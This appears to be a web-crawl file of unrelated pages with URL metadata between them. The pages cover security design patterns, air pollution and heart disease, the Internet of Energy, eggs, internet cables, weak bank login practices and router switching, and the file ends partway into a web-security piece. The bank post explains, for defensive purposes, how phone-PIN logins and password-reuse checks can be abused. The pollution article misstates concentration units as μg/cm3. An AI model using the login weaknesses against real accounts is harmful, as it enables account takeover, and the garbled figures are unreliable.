When processing input of any kind, if a problem is detected, fail safely and stop processing the request. Log (and optionally alarm) the incident. Failure to validate or continue could result in any number of unwanted conditions, including a crashed or compromised system, escalated privileges or a denial of service.
Configure systems such that they, by default, prevent all access. Then, selectively add privileges for users, hosts or protocols.
Design critical systems for high availability. This may include the following:
· Hot-swappable hardware (disk, cpu, memory),
· Redundant servers and network devices (email servers, routers, firewalls), and
· Clustered and fail-over applications (web, application and database servers)
· Employ the premise of “deny all” and only allow specific protocols, host or users
· Provide system lockouts on consecutive bad login attempts.
· If an application encounters an error while processing a transaction, trap and return the errors and exit cleanly.
· When dealing with sensitive information requiring encryption, if the encryption fails, return an error and ensure all temporary cleartext is securely wiped from disk and memory.
· Create a high-availability environment with redundant or failover components.
aSystem failures are logged and alarmed.
aA misconfiguration or software bug does not suddenly expose all resources.
aA single device or application failure does not lead to a denial of service.
rExtra cost and effort is required to support a redundant and fail-safe enterprise.
Low Hanging Fruit
New installations of operating systems, applications and hardware are rarely secure by default. Often, they are configured to be as “useable” as possible by enabling most or all services and defaulting to trivial or no authentication mechanisms. Lacking the most current patches, this all results in a very insecure configuration.
Under pressure to bring this into production, there may not be the opportunity to properly secure it. Since the risk of activation may be significant, however, something must still be done. Low hanging fruit are simple fixes that can be implemented quickly and will greatly improve the overall security.
Good security is a cycle that requires intelligent planning, careful implementation and meaningful testing. Unfortunately, administrators, developers and managers may not have the time or opportunity to properly complete this cycle. Therefore, taking advantage of the quick wins may be the only opportunity to establish reasonable security.
“Some security now is better than perfect security never.”
· Administrators or developers may not have the time to implement perfect security. That is, business or external forces may require that a system be made immediately accessible without undergoing proper hardening.
· The skills required to properly secure applications might not be immediately available.
· An adequate testing environment for new tools and procedures may not be available.
Do not to attempt to redesign the environment or reinstall applications. At this stage, the goal is to apply these basic steps to remove obvious vulnerabilities (and gain valuable awareness) of the systems and environment. Each fix (just as with the examples listed below) should be fairly simple to address and execute. The goal is to be able to plug as many holes as quickly as possible.
· Patch the software. Patch the hardware.
· Prevent all but essential processes from running on startup.
· Log all network and application activity. Monitor these logs.
· Learn to recognize normal behavior and what may be malicious activity. Pay attention to the activity patterns in your environment (protocols, traffic profiles, most active/ least active users).
· Promote employee awareness programs, perhaps as a weekly security bulletin or message of the day.
· Change the default password when applications are first installed; you don’t need to make it undefeatable for now, just different than the default.
· Run applications as lesser-privileged users (in chroot jails, for example).
· Enable sufficient application error handling and data checking.
· Employ basic authentication on private web directories.
· Vendors will often recommend minimal configuration changes to their products to prevent trivial attacks against default installations. Be sure to follow them!
· Standardize installations of similar machines, with scripting or ghosting. Be sure to patch these source images.
· Remove expired user accounts.
· Remove or disable all unused or “temporary” access or authorization privileges.
· Configure centralized logging (aka a log server).
· Configure TCPWrappers to deny all but specific hosts, and log both failed and successful connections.
· Be aware of vulnerabilities by signing up for industry and vendor mailing lists.
· Replace cleartext protocols with secure alternatives (ssh, https, etc).
· In the absence of proper backup facilities, use tar and custom scripts to backup information.
aSome of the most effective security measures can be accomplished with these simple steps.
aServers begin operation with an acceptable, minimum level of protection.
aApplications are not left exposed to trivial attacks and vulnerabilities.
aBasic troubleshooting and auditing trails are enabled.
Risk Assessment and Management
Alias: Other well-known names for the pattern, if any.
Motivation: A scenario that illustrates a design problem. The scenario will help you understand the more abstract description of the pattern that follows.
Problem: Describes the problem to be solved.
Forces: Forces determine why a problem is difficult. Describe the forces influencing the problem and solution.
Solution: The solution should solve the problem stated in the problem section. A good solution has enough detail so the designer knows what to do yet general enough to address a broad context.
Examples: Concrete examples that illustrate the application of the pattern.
Consequences: How does the pattern support its objectives?
Related Patterns: What design patterns are closely related to this one?
Architectural Patterns for Enabling Application Security, http://citeseer.nj.nec.com/yoder98architectural.html.
Group of Four design patterns: The template for these patterns were adopted from the template used by the Gang of Four at http://www.hillside.net/patterns/Writing/GOFtempl.html
Pattern Checklist: A checklist of for defining a pattern can be found at http://www.hillside.net/patterns/Writing/Check.html.
· Describes a single kind of problem.
· Describes the context in which the problem occurs.
· Describes the forces leading to the solution.
· Describes at least one actual instance of use.
· Describes or refers to other patterns that it relies upon.
Risk equation, Peter Tippett, executive publisher, Information Security magazine.
Bruce Schneier
“Security Manager Initiates Friendly Fire”, http://www.computerworld.com/cwi/story/0,1199,NAV47_STO59330,00.html
SP 800-27, “Engineering Principles for Information Technology Security (A Baseline for Achieving Security)”, June 2001, http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf
Sasha Romanosky is currently a Senior Security Engineer at a major financial institution and lives in San Francisco. He has a Bachelor of Science in Electrical and Computer Engineering from the University of Calgary, Canada and has been working with computer and Internet technologies for over 6 years. His passion is Internet security.
He can be reached at firstname.lastname@example.org. | <urn:uuid:85ed747a-7909-469a-9d2b-49a42ed7df8f> | CC-MAIN-2022-40 | https://www.cgisecurity.com/lib/securityDesignPatterns.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00688.warc.gz | en | 0.904448 | 7,495 | 2.65625 | 3 |
A new study soon to appear in the Journal of Public Health suggests that air pollution and living in apartment buildings may be associated with an increased risk for dangerous conditions like heart disease, stroke, and type 2 diabetes.
Cardiovascular diseases are a leading cause of death in developing countries.
Hypertension and metabolic syndrome are important causes of cardiovascular diseases.
Metabolic syndrome is further associated with abdominal obesity, elevated blood pressure, and higher blood glucose levels.
These conditions are associated with a higher risk for various health problems.
The causes of these disorders are complex and are related to genetic factors, lifestyle, diet, and environmental factors including traffic air pollution, traffic noise, residential housing, and neighborhood quality.
Researchers here investigated the associations between a long-term exposure to ambient air pollution and residential distance to green spaces and major roads with the development of hypertension and some components of metabolic syndrome.
These associations were assessed among people living in private houses or multi-story houses in Kaunas City, a city of 280,000 and the second largest city of Lithuania.
In the present study, researchers investigated the association between a long-term exposure to ambient air pollution and the residential distance to green spaces and major roads with the development of hypertension and some components of metabolic syndrome.
These components included: a high triglyceride level, reduced high-density lipoprotein cholesterol, higher blood glucose, and obesity.
The associations were assessed among people who lived in either private or multifamily houses.
The results indicate that air pollution levels above the median are associated with a higher risk of reduced high density lipoprotein.
Traffic-related exposure was associated with the incidence of hypertension, higher triglyceride level and reduced high-density lipoprotein cholesterol.
However, the negative impact of traffic air pollutants was observed only in the participants who lived in multifamily buildings.
Since there is more traffic near the multifamily apartment buildings, this may be associated with the incidence of hypertension as well.
In addition, a built-up environment, high residential density, street traffic and its configurations are further factors associated with social interactions and supportive relationships, which could also impact cardiovascular health.
The greenness, size, and type (activity) of the available open public spaces were observed to be inversely related to the risk factors assessed.
Investigators have additionally found positive effects of the natural environment, and have emphasized the positive impact of such spaces on cardiovascular health.
“Our research results enable us to say that we should regulate as much as possible the living space for one person in multifamily houses, improve the noise insulation of apartments, and promote the development of green spaces in multifamily houses” said the study’s lead author, Agn Brazien.
Exposure to air pollution is the largest environmental health risk and ranks ninth among modifiable disease risk factors, above other common factors such as low physical activity, high cholesterol, and drug use (2). Most of the excess deaths attributable to air pollution exposure are due to acute ischemic/thrombotic cardiovascular events.
Air pollution may also be an important endocrine disrupter, contributing to the development of metabolic diseases such as obesity and diabetes mellitus (5).
While the developing world is most burdened by air pollution-associated health effects, the association between air pollution and mortality is still evident in developed countries where pollution levels are well below target standards (6, 7).
The purpose of this article is (1) to introduce the reader to the major studies that have established the link between particulate matter (PM) air pollution and human cardiovascular and metabolic disease and (2) to discuss the mechanisms by which PM mediates its biologic effects.
Air pollution is a complex mixture of gaseous and particulate components, each of which has detrimental effects on cardiovascular and respiratory systems.
The composition of air pollution varies greatly, depending on the source, emission rate, and sunlight and wind conditions. Gaseous components of air pollution include nitrogen dioxide (NO2), nitric oxide (NO), sulfur dioxide (SO2), ozone (O3), and carbon monoxide (CO) (2, 15, 16).
Particulate matter (PM) components of air pollution consist of carbonaceous particles with associated adsorbed organic chemicals and reactive metals. Common components of PM include nitrates, sulfates, polycyclic aromatic hydrocarbons, endotoxin, and metals such as iron, copper, nickel, zinc, and vanadium (2, 15, 17).
PM is subclassified according to particle size into (a) coarse (PM10, diameter <10μm), (b) fine (PM2.5, diameter <2.5μm), and (c) ultrafine (PM0.1, diameter <0.1μm). Coarse particles derive from numerous natural and industrial sources and generally do not penetrate beyond the upper bronchus. Fine and ultrafine particles are produced through the combustion of fossil fuels and represent a greater threat to health than coarse particles as they penetrate into the small airways and alveoli (16–19).
While the organic and metal components of particles vary with location, levels of PM2.5 have consistently correlated with negative cardiovascular outcomes regardless of location (15).
Epidemiological studies linking Pm exposure to morbidity and mortality in humans
The association between high levels of PM air pollution and adverse health outcomes has been known since the first half of the twentieth century.
Smog incidents in Meuse Valley, Belgium (1930), Donora, Pennsylvania (1948), and London, UK (1952) acutely caused increased hospitalizations and deaths, particularly in the elderly and those with preexisting cardiac and respiratory diseases.
These incidents resulted in policy changes including the implementation of Clean Air Act in 1970 (22).
The reduction in PM levels have led to gradual reduction in PM-associated morbidity and mortality; however, recent epidemiologic studies still consistently show a link between PM exposure and cardiopulmonary mortality.
Short-term exposure studies
The increased deaths due to the smog in Meuse Valley, Donora, and London clearly suggested that acute exposure to air pollution is associated with adverse health outcomes. These classic cases of air pollution-induced mortality represent extreme examples, with the London smog reaching air PM concentrations of 4.5 mg/m3 (World Health Organization current safety guideline is 25 μg/m3) (21).
A recent meta-analysis of 110 peer-reviewed studies revealed that every 10 μg/cm3 increase in PM2.5 concentration was associated with a 1.04% (95% CI 0.52%-1.56%) increase in all-cause mortality (10).
Hospitalizations and mortality due to cardiovascular and respiratory illnesses were positively correlated with increases in PM2.5 concentrations.
Several large, multi-city studies have been conducted in both North America and Europe, the largest being the NMMAPS (National Morbidity, Mortality, and Air Pollution Study) (23–25) and APHEA (Air Pollution and Health: A European Approach) (26, 27) studies.
Findings from these studies were remarkably consistent and demonstrated that PM levels are significantly associated with daily all-cause, cardiovascular, and pulmonary mortality. Seasonal and regional variations existed in both studies possibly attributable to different sources of pollutants, meteorological conditions, and population differences.
For example, the APHEA study found a stronger effect of PM on daily mortality in cities with a larger contribution of traffic emissions to total PM.
This is in agreement with a recent study on triggers of myocardial infarction (MI) in which traffic exposure was found to be as significant of a trigger of MI as physical exertion and alcohol use (28).
The NMMAPS study also found that the relationship between PM exposure and mortality was independent of gaseous co-pollutants, including NO2, CO, and SO2.
Studies carried out in Asia and the developing world have generally shown smaller effects on daily mortality due to PM than studies from the United States and Europe. A recent meta-analysis of 85 studies from 12 low- and middle-income countries showed a 0.47% (95% CI 0.34-0.61) increase for cardiovascular mortality and 0.57% (95% CI 0.28-0.86) increase for respiratory mortality for every 10 μg/cm3 increase in PM2.5 concentration (14).
The cities covered by this analysis have mean PM2.5 levels ranging from 56 to 179 μg/cm3, which is significantly higher than the mean the PM2.5 levels in cities in the US and Europe.
The reduced concentration-response relationship between PM2.5 levels and mortality in these countries is likely due to the higher baseline PM level seen in these countries. Indeed, current evidence suggests that the concentration-response relationship between PM2.5 levels and mortality is biphasic (29–33).
A steep concentration-response function is observed at lower PM concentrations, while the curve flattens at higher concentrations.
A recent study from Beijing, China found that while the slope of the concentration-response curve flattened at higher PM concentrations, there was no saturation for increased risk of ischemic heart disease mortality, even at PM concentrations as high as 500 μg/cm3 (33).
The biphasic relationship between PM concentration and adverse health outcomes means that the major health benefits from reducing PM levels will occur in countries with already cleaner air and that improvements in cardiovascular health will be more difficult to achieve in countries with higher levels of air pollution unless they can achieve a drastic improvement in PM concentrations.
The results of the NMMAPS and APHEA studies suggest that there is no “safe” threshold under which increases in PM are not associated with increased deaths.
Long-term exposure studies
In addition to studies on the acute effects of PM exposure, studies on the effect of chronic exposure to PM have revealed negative effects on long-term health outcomes.
The first of these was the Harvard Six Cities study, which prospectively measured the effect of air pollution on mortality in a cohort of 8,111 adults while controlling for individual risk factors, including smoking, body mass index, occupational exposures, hypertension, and diabetes (34).
The adjusted mortality rate ratio for the most polluted cities compared with the least polluted cities was 1.26 (95% CI 1.08-1.47). Air pollution, particularly PM2.5 and sulfates was positively associated with death from lung cancer and cardiopulmonary diseases.
Both PM2.5 and SO2 were positively correlated with all-cause, lung cancer, and cardiopulmonary mortality and every 10 μg/cm3increase in PM2.5 was associated with a 4, 6 and 8% increased risk of all-cause, cardiopulmonary, and lung cancer mortality, respectively. Coarse particles and gaseous co-pollutants other than SO2 were not significantly related to mortality.
A study on 22 European cohorts within the multicenter European Study of Cohorts for Air Pollution Effects (ESCAPE) found an increased hazard ratio for all-cause mortality of 1.07 (95% CI 1.02-1.13) per 5 μg/cm3 PM2.5 (37).
Significant associations persisted even among participants exposed to PM2.5 levels below the European annual mean limit value of 25 μg/cm3.
Overall, the evidence from both short-term and long-term exposure studies demonstrates a consistent association between increased air pollution exposure and mortality. While the magnitude of this effect is small, the ubiquity of air pollution exposure makes it a significant source of early mortality.
A global assessment of mortality attributable to several risk factors, including air pollution was carried out in the Global Burden of Diseases, Injuries, and Risk Factors Study 2015 (GBD 2015) (38).
This study estimated that PM2.5 is the fifth-ranking mortality risk factor, leading to 4.2 million deaths and 103.1 million disability-adjusted life-years in 2015. The largest number of deaths attributable to air pollution occurred in China with an estimated 1.11 million deaths.
These numbers are similar to the findings of a recent study from China that attributed 40.3% of deaths due to stroke, 26.8% of deaths due to ischemic heart disease, 23.9% of deaths due to lung cancer, and 18.7% of deaths due to chronic obstructive pulmonary disease (COPD) to PM2.5 exposure (39).
According to the GBD 2015 study, these represent the 1st, 2nd, 4th, and 5th leading causes of death in China, respectively (12).
Susceptibility to PM-induced morbidity and mortality
Enhanced risk of cardiovascular death from PM exposure has been linked to old age, low socioeconomic status, preexisting heart and lung disease, and smoking.
The APHENA (Air Pollution and Health: A Combined European and North American Approach) study, which analyzed data from the NMMAPS and APHEA studies found that the elderly and unemployed are at higher risk for the deleterious health effects associated with short-term exposure to PM (40).
The ACS study found that mortality from ischemic heart disease was positively correlated with chronic PM2.5 exposure among never smokers, former smokers, and current smokers (41). However, the risk for death due to arrhythmia, hearth failure, and cardiac arrest was not elevated by PM2.5 for never smokers, but significantly elevated for former and current smokers.
Studies have not shown a clear association between race and susceptibility to PM-induced health effects (42–44). However, air pollution in non-white neighborhoods tends to be higher than in majority-white areas, resulting in exposure disparities (45).
Finally, it has been suggested that women may be more susceptible than men to the PM-induced health effects. Particularly, robust risk estimates have been reported for studies that include only women.
The Women’s Health Initiative Observational Study found that every 10 μg/cm3 increase in PM2.5 was associated with a 76% increase in fatal cardiovascular events while the Nurses’ Health Study found that every 10 μg/cm3 increase in PM10 was associated with a 43% increase fatal coronary heart disease (48, 49).
More recent large studies have given conflicting results (42, 43). On a global scale, exposure disparities may play a role in increased risk for women as use of biomass fuels for cooking in sub-Saharan Africa and south Asia expose women to disproportionately high levels of indoor air pollution (50).
More information: “Association between the living environment and the risk of arterial hypertension and other components of metabolic syndrome”Journal of Public Health (2019).
Journal information: Journal of Public Health
Provided by Oxford University Press | <urn:uuid:87cef442-22a3-4e66-9be6-a8cc3ac146a4> | CC-MAIN-2022-40 | https://debuglies.com/2019/06/25/air-pollution-is-associated-with-an-increased-risk-of-heart-disease-and-type-2-diabetes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00688.warc.gz | en | 0.941224 | 3,086 | 2.59375 | 3 |
Internet of Energy, digitalization and the circular economy
The pace of business model change—driven by digitalization—and the resulting disruption in many categories are challenging companies today. Digitalization, though, is only an enabler for the Internet of Energy and other upcoming technological trends, which will demand a radical change of economy.
The imperative of climate change and pollution mitigation in times where we expect population and individual demand to grow rapidly dictates optimized use of any available resource. The “circular economy” concept—which contrasts with today’s linear economy (take, make, use, dispose)—is useful here and more important now than ever before. And the Internet of Things, enabled by digitalization, will play a crucial role in making this concept work.
The circular economy concept requires that any resource is optimized in terms of renewability (energy used), reusability (cycling valuable metals, alloys and polymers beyond the shelf life of individual resources) and recyclability (compostable packaging). It is basically about optimizing the energy and natural resource ecosystems, and that can only happen by interconnecting the stakeholders of our infrastructure and our economy. No single player alone will be able to make a significant impact. The circular economy requires integrated information about demand and resource, and it requires the balance between the two to be optimized.
The backbone of this optimization will be the Internet of Things. It will allow assets to exchange data and, for example, machine learning algorithms to optimize demand dependent on priorities and available resource. It’s too soon to discuss the impact of that on our current industry silos—let alone individual companies. And while we use the term “disruption” so extensively already, the greatest levels of disruption are still to come!
Within the energy sector, the circular economy would be powered by an “Internet of Energy” shaped by the imperative of decarbonisation (supported by transitioning sectors that today rely heavily on fossil fuels, such as heat and transport, to electricity-based power). The Internet of Energy would feature distributed generation with a high share of renewable energy, empowered by storage in all forms (grid, behind-the-meter and electric vehicles), demand response supported by smart grid assets down to “white goods”—and a fully transparent cost and value structure that takes into account levelized cost of energy (LCoE), cost of externalities, time and location of generation, value of ancillary services and storage, opportunity cost, etc. I like to think of it as a “neuronal electricity network” in which generation and demand are optimized on result and empowered by machine learning algorithms. This would mean a total restructuring of the current energy ecosystem, where we could optimize operation at an entire system level without barriers.
A suitable setup for an Internet of Energy could be a centralized electricity system with large-scale renewables, storage and flexible backup power interconnected to a decentralized electricity system with distributed generation, combined heat and power, electric vehicles, smart white goods, etc. The Internet of Energy would ensure that all grid-connected assets (from nuclear power plants to coffee machines) can communicate and interact with one another, allowing for optimized generation and demand capacity management while honoring some hard settings (for instance, hospital operations theaters need power no matter what). It would require a good set of energy market rules as well to drive behavior while constantly adapting to user preferences and best performance.
But changes toward an Internet of Energy will not all happen simultaneously. First, we will see (and see already) IoT technology adopted to optimize current industry solutions and provide competitiveness among industry players. Practically all the leading OEMs in the energy space (and others) advertise their advancements and offerings in the IoT space already today.
Longer term, we will see how the competition between financial short-term interests of individual companies and common interest in long-term liveability of the planet pans out. But the current transformation of the oil and gas industry and the pledge of world leading companies to stick to the COP 21 climate change agreement, despite political disorientation in some parts of the world, allow for at least some cautious optimism. | <urn:uuid:8dc2d4d9-25ca-4dc7-8592-a6f8f4d3347a> | CC-MAIN-2022-40 | https://www.iotworldtoday.com/2017/08/31/internet-energy-digitalization-and-circular-economy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00688.warc.gz | en | 0.923513 | 849 | 2.84375 | 3 |
Eggs are among the most nutritious foods on the planet, containing a little bit of almost every nutrient you need.
High in cholesterol, but eating eggs does not adversely affect cholesterol in the blood for the majority of people.
Eating them consistently leads to elevated levels of HDL (the “good”) cholesterol, which is linked to a lower risk of many diseases.
Among the best dietary sources of choline, a nutrient that is incredibly important but most people aren’t getting enough of.
Egg consumption appears to change the pattern of LDL particles from small, dense LDL (bad) to large LDL, which is linked to a reduced heart disease risk.
The antioxidants lutein and zeaxanthin are very important for eye health and can help prevent macular degeneration and cataracts.
Omega-3 enriched and pastured eggs may contain significant amounts of omega-3 fatty acids. Eating these types of eggs is an effective way to reduce blood triglycerides.
For more tips, follow our today’s health tip listing. | <urn:uuid:d014e733-702d-4d4f-a8b9-cc8ebec943ac> | CC-MAIN-2022-40 | https://areflect.com/2019/09/25/todays-health-tip-benefits-of-eggs-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.945902 | 220 | 3.125 | 3 |
Most of us know the general distinction between ADSL, COAX and Fibre internet, but the cables behind these connections may be more of a mystery. The three most common types of communication cables are Twisted Pair, Coaxial, and Fibre Optic – understanding the difference of how data travels through each cable is what ultimately affects things like speed, latency, security, cost, etc. Here is a general breakdown of the three different types of cable and what they are capable of:
Twisted Pair Internet Cables:
Twisted pair cables are literally a pair of insulated wires that are twisted together. While this does help to reduce outside noise, these cables are still very susceptible to it. Twisted pair cables are the most cost-effective option of the three – mostly due to their lower bandwidth capacity and high attenuation. There are two types of twisted-pair cables:
Unshielded twisted pair (UTP)
- ‘Unshielded’ meaning it does not rely on physical shielding to block interference
- The most commonly used cable of the two, these are often used for both residential and business internet
- There are several UTP categories, which increase in bandwidth as you move up the scale, for example:
- CAT1 = up to 1Mbps | CAT2 = up to 4 Mbps | CAT5e = up to 1Gbps
Shielded twisted pair (STP)
- ‘Shielded’ with a foil jacket to cancel any outside interference
- Used primarily for large-scale enterprises, high-end applications, and exterior cabling that will be exposed to environmental elements.
Coaxial Internet Cables:
Coaxial cables are high-frequency transmission cables made up of a single solid copper core that transfers data electrically over the inner conductor. Coax has 80X more transmission capacity than twisted-pair cables.
This type of cable is commonly used to deliver TV signals (its higher bandwidth makes it more suitable for video applications) and to connect computers to a network or to the internet. Along with the stable transmission of data, coax also has anti-jamming capabilities and can effectively protect signals from being interfered with. The cost is slightly higher than twisted-pair cables, but still more economical than fibre. There are also two types of coaxial cables:
- Most commonly used to transmit video signals
- Often used to connect video signals between different components like DVDs, VCRs, or receivers commonly known as A/V cables
- Primarily utilized to transmit a data signal in a 2-way communication system
- Most commonly used for computer ethernet backbones, AM/FM radio receivers, GPS antenna, police scanners, and cell phone systems
Fibre Optic Internet Cables:
Fibre is the newest form of transmission cabling technology. Instead of transferring data over copper wires, these cables contain optical fibres that transmit data via light, rather than pulses of electricity. Each individual optical fibre is coated with plastic and contained in a protective tube. This makes fibre optic cables extremely resistant to external interference. The result is a super reliable, high-speed connection with 26,000X more transmission capacity than twisted-pair cables – but also a much higher cost. Again, there are two types of fibre cables:
- Has a small core and only allows one mode of light to propagate at a time
- Because of this, the number of light reflections decreases as they pass through the core
- The result is low attenuation and data that is able to travel further and faster
- Commonly used in telecom, CATV networks, and Universities.
- Has a larger core diameter that lets multiple modes of light propagate
- The number of light reflections increases as they travel through the core, which allows more data through
- Because of its high dispersion, multimode cables have lower bandwidth, higher attenuation and reduced signal quality further it travels
- Most commonly used for communication over short distances such as LAN, security systems, and general fibre networks.
Fibre networks can be shared or dedicated – make sure you’re choosing the right one for your needs.
Thinking back to grade school and the Goldilocks and the Three Bears analogy, all three types of internet cable offer something different. Dedicated Fibre might be too hot, but ADSL might be too cold. If you need help finding your “just right” solution, contact us – our team of experts is here to help. | <urn:uuid:abfe63d2-e099-4deb-8dcb-6b025ea72149> | CC-MAIN-2022-40 | https://itel.com/understanding-internet-cables/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.924131 | 937 | 3.46875 | 3 |
Despite assembling formidable armies of cybersecurity personnel armed with cutting-edge information security technologies, many financial institutions, healthcare facilities, and other organizations handling highly-sensitive information still utilize deficient authentication processes when interfacing with the public. While industry attention in recent years has been focused on multi-factor authentication (or the lack thereof), technological vulnerabilities, and social engineering attacks, there are several significant weaknesses in design that have not yet received adequate attention. I discuss several below with the hope that readers will take proper precautions, and that any organizations needing to implement modifications will do so; please note that all of these problems are real, and have been observed and/or tested in recent weeks:
1. Allowing people to authenticate over the phone by using ATM PIN numbers1
ATM PIN Numbers are acceptable as authentication at ATMs because the person using them to access an account must also present an ATM card – the card being something that the user physically possesses, and the PIN Number being something that the user alone knows, combining to create a basic form of multi-factor authentication. Of course, ATM PIN Numbers on their own are quite weak for authentication – typically consisting of only 4 numeric digits, and, often entered in public locations at times when others know they are being typed – but, as bank systems are typically programmed to lock accounts if a card is presented at an ATM or multiple ATMs and the wrong PIN is entered more than a few times, such security is often considered adequate; statistically speaking, the reasoning goes, someone who steals an ATM card is unlikely to be able to try enough PIN Number combinations to find a hit. (Related vulnerabilities are beyond the scope of this article.) However, the minute that people can authenticate over the phone using the same PIN Number – without presenting a physical ATM card – the level of security is dramatically reduced, as authentication relies on only a single, weak password. Locking an account after some number of incorrect attempts is also problematic in such a scenario – as such a policy would mean that anyone who knows a user’s login name and account number (which includes everyone who ever received a check from the user) can potentially lock that user out of ATMs simply by calling in multiple times and providing the wrong PIN Number. Of course, banks that allow users to authenticate with their PIN Numbers over the phone may be utilizing other forms of authentication that are invisible to the user – such as voiceprints, etc. – but, asking for a PIN Number absent the corresponding ATM card still raises questions.
2. Allowing people to enter passwords via telephone tones
Obtaining account information via a standard voice-based telephone call may have been quite common in the 1990s, but, today, various systems that still provide such legacy services undermine the security of users’ accounts by allowing passwords to be entered via the touchtones corresponding with letters on the standard telephone dialing pad. Because each number from 2-9 corresponds with 3 or 4 letters, and does not distinguish between upper and lower case characters, such a login system dramatically shrinks the universe of valid passwords, and effectively allows thousands of different passwords (instead of just 1) to work for an account. If one’s password is “josephS”, for example, only “josephS” should be accepted as valid; on a touchtone based login, however, entering “LORDsir” will also grant the user access; both appear identical to the authenticator, as they are both entered as “5673747.” Never mind the fact, that, on many phones, each key emits a different tone – passwords entered via touch tones can literally be recorded by anyone within an earshot or otherwise listening in to a call. The bottom line is that allowing people to enter passwords via telephone tones can dramatically weaken the security of any information protected by those passwords.
3. Allowing multi-factor authentication to be circumvented when users login from financial institutions
In order to facilitate inter-bank transfers, consolidated account reporting, and various other features that require financial institutions to communicate with one another, various systems that require multi-factor authentication when users login via the Internet do not require a second factor when another bank system logs in on behalf of a particular user. While such a policy in itself may be both acceptable and necessary in many cases, there have been situations observed in which the configuration information detailing from which systems user accounts can be accessed without a second factor is not kept up to date, or was configured overly broad to begin with; in at least one case, human users were able to circumvent a system’s second factor requirement simply by logging in from a particular network belonging to another financial institution.
4. Undermining strong authentication and other security technologies via “auto-reload” and other default-payment-source features
We have already seen real-world examples in which criminals were able to steal money from people’s bank accounts by hacking into systems unrelated to those accounts, but which users had configured to automatically pay for goods and/or services using the relevant accounts. If a criminal breaches a system that is set to reload a gift card account when the balance falls below a certain amount, for example, or to utilize a certain account by default for payments, the nefarious party may be able to effectively empty out the associated bank account by performing multiple reloads and or payments, without ever being subjected to the full scope of the bank’s authentication and anti-fraud measures.
5. Providing information about passwords after unsuccessful login attempts.
When someone attempting to gain access to a particular system enters an incorrect username+password combination, the system in question should not provide any information to that party other than communicating to him or her that the combination provided is not valid; yet, I have seen multiple systems, that, even in 2018, still provide the user with unnecessary details that can be exploited as part of attacks (e.g., the password is invalid (but not the username), the password contains illegal characters, etc.)
6. Providing information about prior passwords
Anyone protecting any sizeable collection of sensitive information accessible to large communities of account holders via the Internet must account for the unfortunate reality that, despite the best efforts of his or her team, there will be instances in which unauthorized parties will gain access to some accounts. Yet, some bank systems, to this day, prevent users from reusing their last x number of passwords when resetting passwords, and inform the user explicitly when a new password provided on a change password form is unacceptable because it was recently used as a password. Because people tend to reuse passwords between systems, and because many organizations do not lock accounts if an authenticated user changes his or her password “too often,” employing such a strategy potentially gives criminals a way to test passwords likely to be valid on other systems without risking a repeated-failed-login lock out. Incidentally, on systems ostensibly enforcing a no-reuse-of-the-last-x-passwords policy, I have tested resetting a password x+1 times in a row with no other activity in between, and, on all of them, I was able to reset the password back to my original password – raising serious questions about the efficacy of the implementation of the policy altogether.
7. Logging unsuccessful login attempts in cleartext, and then failing to adequately protect such data
While there are legitimate security reasons for storing the details of every failed login attempt, anyone doing so must consider that one common mistake that probably every computer-literate person has made at least once is entering the password to one system when logging in to another. As such, databases of failed login attempts on any heavily-used consumer-facing system almost always contain significant collections of valid username-password combinations for other systems, and, in many cases, for systems of a similar nature (e.g., the password for bank A entered when logging into bank B). Any party storing such data, therefore, must protect it; yet, I have seen more than one environment in which technical staff did not know how many copies of the relevant data existed, never mind where all such data resided or who had access to it.
There are, of course, many other design issues that may be present in various login processes – but, I thought that the aforementioned seven would provide some good food for thought…
1(Yes, stylistically we write PIN Number even if the second word is, technically speaking, redundant – see Wikipedia’s entry on RAS Syndrome for more details.) | <urn:uuid:404a9651-9e91-494a-a9a9-ea3ca6f37b69> | CC-MAIN-2022-40 | https://josephsteinberg.com/warning-these-7-common-online-banking-features-often-weaken-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.944502 | 1,748 | 2.671875 | 3 |
Process Switching and Fast Switching
These are 2 of widely discussed terms in IP Routing with both methods addressing the primary function of forwarding the packets to the destination. Process switching is the older of the 2 technologies.
What is Process Switching?
Process switching is responsible for inspecting every packet by the processor. This was the original switching mechanism available on Cisco routers. SNMP traps from the router and telnet packets destined for the router are always process-switched.
Since the process routing task is more processor-intensive, more complex, and introduces a longer latency, skipping this operation on all the packets except the first (all with the same destination address) is very advantageous and efficient. Fast Switching was introduced to offload CPU/processor for other key activities.
What is Fast Switching?
In Fast Switching, the first packet to a destination is process switched but subsequent packets are forwarded using the information stored in the fast cache.
Below table compares the terms Process Switching and Fast switching and shares the differences between each Routing mechanism type –
For subscribers interested in understanding the difference between CEF and Fast Switching, below link can be referred –CEF vs Fast Switching
Related- Function of Network Switch | <urn:uuid:9e515787-69c8-4172-bb15-3435ea0bc00f> | CC-MAIN-2022-40 | https://ipwithease.com/process-switching-vs-fast-switching/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00688.warc.gz | en | 0.920079 | 251 | 2.953125 | 3 |
A plethora of valuable solutions now run on web-based applications. One could argue that web applications are the forefront of the world. More importantly, we must equip them with appropriate online security tools to barricade against the rising web vulnerabilities. With the right tool set at hand, any web site can shock-absorb known and unknown attacks.
Today the average volume of encrypted internet traffic is greater than the average volume of unencrypted traffic. Hypertext Transfer Protocol (HTTPS) is good but it’s not invulnerable. We see evidence of its shortcoming in the Heartbleed Bug where the compromise of secret keys was made possible. Users may assume that they see HTTPS in the web browser and that the website is secured.
But there are a lot of moving parts in online security and its underlying infrastructure. Therefore cyber criminals are able to jump tracks like a moving train, to compromise and target a valuable asset. All these problems are compounded by the fact that web applications are built on flaky old protocols
Hindering Legacy Protocols
